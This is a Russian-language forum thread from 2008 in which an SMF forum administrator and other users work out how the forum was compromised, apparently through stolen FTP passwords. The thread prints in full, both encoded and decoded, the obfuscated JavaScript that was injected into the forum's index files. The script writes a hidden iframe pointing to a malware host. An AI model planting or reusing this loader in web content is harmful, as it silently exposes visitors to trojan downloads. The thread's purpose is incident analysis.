Мой SMF Форум атакован и заражен вирусом.

[Flame]

http://cossacks.la2.kiev.ua/

Основновной вопрос пожалуй не вылечится от заразы, а выяснить как она туда попала.

В файлах:
www/Smileys/index.php
www/Smileys/default/index.php

Появился следующий код:

<script>function v4766b41889697(v4766b41889a87){ function v4766b41889e64 () {return 16;} return(parseInt(v4766b41889a87,v4766b41889e64()));}function v4766b4188a634(v4766b4188aa1e){ function v4766b4188b5d6 () {return 2;} var v4766b4188ae03='';for(v4766b4188b1ec=0; v4766b4188b1ec<v4766b4188aa1e.length; v4766b4188b1ec+=v4766b4188b5d6()){ v4766b4188ae03+=(String.fromCharCode(v4766b41889697(v4766b4188aa1e.substr(v4766b4188b1ec, v4766b4188b5d6()))));}return v4766b4188ae03;} document.write(v4766b4188a634('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D633939313965383662363539207372633D5C27687474703A2F2F73706C2E7669702D64646F732E6F72672F696E6465782E7068703F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A39383634292B27316133346237356138635C272077696474683D343131206865696768743D3234207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script> 

Вот эту вот строку:

3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D633939313965383662363539207372633D5C27687474703A2F2F73706C2E7669702D64646F732E6F72672F696E6465782E7068703F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A39383634292B27316133346237356138635C272077696474683D343131206865696768743D3234207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'

перевели, она означает:

document.write('')





die4bass (12:15:46 9/01/2008)
только что зашел на форум, Sophos выдал мне такое - 20080109 101425     Virus/spyware 'Mal/ObfJS-C' has been detected in "C:\Documents and Settings\vlipskiy\Local Settings\Application Data\Mozilla\Firefox\Profiles\zx1xexqi.default\Cache\7B7EF77Ed01".



аналогичный троян на сайте консульства США в Питере
http://byjournal.com/hack/2007/09/14/atakovan-sajt-konsulstva-ssha-v-pitere/

[Avdenago]

чтобы понять КТО и КОГДА и КАК надо смотреть логи доступа и ошибок сервера.

[Flame]

Расшифровали до конца все.

<script>
function v4766b41889697(v4766b41889a87)
     { function v4766b41889e64 ()
     {return 16;}
     return(parseInt(v4766b41889a87,v4766b41889e64()));}
     function v4766b4188a634(v4766b4188aa1e)
     { function v4766b4188b5d6 ()
     {return 2;}
     var v4766b4188ae03='';
     for(v4766b4188b1ec=0; v4766b4188b1ec<v4766b4188aa1e.length; v4766b4188b1ec+=v4766b4188b5d6())
          { v4766b4188ae03+=(String.fromCharCode(v4766b41889697(v4766b4188aa1e.substr(v4766b4188b1ec, v4766b4188b5d6()))));}          return v4766b4188ae03;} document.write(v4766b4188a634('<SCRIPT>window.status='Done';Document.write('<iframe                name=c9919e86b659 src=\'http://spl.vip-ddos.org/index.php?'+Math.round(Math.random()*9864)+'1a34b75a8c\' width=411           height=24 style=\'display: none\'></iframe>')</SCRIPT>'));</script>

Вобщем даунлоадер троянов, встроеный в форум.
http://spl.vip-ddos.org/index.php?'+Math.round(Math.random()*9864)+'1a34b75a8c\
хвост сзади - это как ссылка GET


Доступа CHMOD на запись в Smileys/index.php нету. Апач put'ить тоже не позволяет.
Скорее всего заражен либо я, либо другой администратор с доступом по фтп, по логам нашел, что с моего аккаунта заходили на форум с какого то Unated States ip
66.36.243.216 -> /home/cossacks/www/Smileys/index.php (User: cossacks) (2 Times)
66.36.243.216 -> /home/cossacks/www/Smileys/default/index.php (User: cossacks) (2 Times)
66.36.243.216 -> /home/cossacks/www/Sources/index.php (User: cossacks) (2 Times)

Но дальше увидел, что заходили и с других аккаунтов.

Украли пароли значит.

[Avdenago]

да, конечно...

я как то не так изначально прочел вопрос.

случаи такие не единичные. Просто у вас украли пасс на фтп. а потом прошелся робот и переписал все index файлы...

При этом все может быть автоматизировано.  то есть и сбор паролей и переписывание файлов.

То есть слабое звено в данном случае - человек.

[Flame]

Как оказалось, были атакованы еще несколько форумов, правда они на бесплатных IPBoard.
Атака абсолютно идентичная.

Я создал тему на форуме игроков официального сервера, на котором мы играем:
http://forums.goha.ru/showthread.php?t=167294

Тот же час в icq написали люди, с описанием взлома ихних форумов, например вот:

dadadje (16:49:29 11/01/2008)
Привет, меня зовут Андрей, это я написал про форум

dadadje (16:50:08 11/01/2008)
взломали наши форумы кланов хулиганы и якудза

dadadje (16:50:24 11/01/2008)
мой форум как раз был hoolihans-clan.ru

dadadje (16:50:50 11/01/2008)
у меня стоял старый бесплатный IPB

dadadje (16:52:21 11/01/2008)
на самом деле в конечном итоге было взломано по той же самой схеме 5 -6 форумов

dadadje (16:53:04 11/01/2008)
мы пытались возбудить уголовное дело по статье мошенничество, но увы далеко это не продвинулось

dadadje (16:53:43 11/01/2008)
если ты мне даш всю информацию, мы попытаемся поймать этих товарищей

FlameHeart (16:56:42 11/01/2008)
Что именно тебе за информация нужна?
У вас тоже был взлом путем добавления в код форума даунлоадера троянов?

dadadje (16:56:55 11/01/2008)
да, тоже самое

dadadje (16:57:07 11/01/2008)
схема идентичная, только адреса разные

dadadje (16:57:14 11/01/2008)
и адрес был хеширован

dadadje (16:57:31 11/01/2008)
мне нужны логи access апача

dadadje (16:59:44 11/01/2008)
ты не мог бы мне целый ротированный лог скинуть на andrey.antonov@kaspersky.com

FlameHeart (17:05:57 11/01/2008)
ты работаешь в kasperskiy.com?

dadadje (17:06:00 11/01/2008)
да

FlameHeart (17:07:18 11/01/2008)
Может ли это быть уявзимость PHPMyAdmin?

dadadje (17:07:38 11/01/2008)
может и админка

dadadje (17:07:51 11/01/2008)
это первое что бросается в глаза

dadadje (17:08:02 11/01/2008)
но может и нет

dadadje (17:08:12 11/01/2008)
надо смотреть СМФ

dadadje (17:08:18 11/01/2008)
какая версия итд

dadadje (17:08:36 11/01/2008)
мне сей час надо по этому инцеденту статью написать

dadadje (17:08:56 11/01/2008)
так что нужна вся информация

dadadje (17:18:27 11/01/2008)
да нет, понимаешь, тут схема другая, т же не один был взломан

dadadje (17:18:44 11/01/2008)
схема одинаковая

dadadje (17:19:00 11/01/2008)
взломаны все по единой тематике

dadadje (17:20:23 11/01/2008)
давай в понедельник продолжем, поеду я домой, пятница ведь.

FlameHeart (17:20:34 11/01/2008)
Из дома не заходишь в аську?

dadadje (17:20:36 11/01/2008)
просто ломали всех по одной схеме

[Flame]

Просканился Адаварей, просканился Лицензионным Касперским, изменил все пароли. Форум "полечил".

Сегодня в папке Packeges в который chmod резко стал "777" появились файлы, которые совсем не похожи на нативный код форума.

Пролистав далее, увидел:
<center><font color='#9acd32' face='Tahoma' size = 1>
<b>| Copyright by <a href="http://www.antichat.ru" title="antichat">Antichat.ru</a>
| Made by Grinay | Modified by <s>Go0o$E</s> <b>Isis</b> |</b>
</font></center></td></tr></table>

На Antichat.ru уже есть обзор уязвимостей SMF
https://forum.antichat.ru/thread46567.html

[Mavn]

На Antichat.ru уже есть обзор уязвимостей SMF
https://forum.antichat.ru/thread46567.html

Из того что там написано непосредственно под smf 1.1.4 есть только одна уезвимость и то воспользоваться ею маловероятно.
Хотите узнать как был взломан форум смотрите логи апача там все предельно ясно будет видно что и как делалось. Чаше ломается попутный софт стоящий рядом например какая то cms, компоненты cms, галереи и прочее.
Если бы было бы реально применить хоть 1 уезвимость из выше перечисленных на том форуме то наш проект был бы взломан в первую же очередь. Потому как по тем же логам наш сайт в среднем пытаются взломать раз 10 в день.

[digger®]

Так это червяк банальный. На виндовс машинах собирает пароли от фтп, потом ходит по ним и вставляет в найденные index.xxx всякую пакость. С движками форумов никак не связано.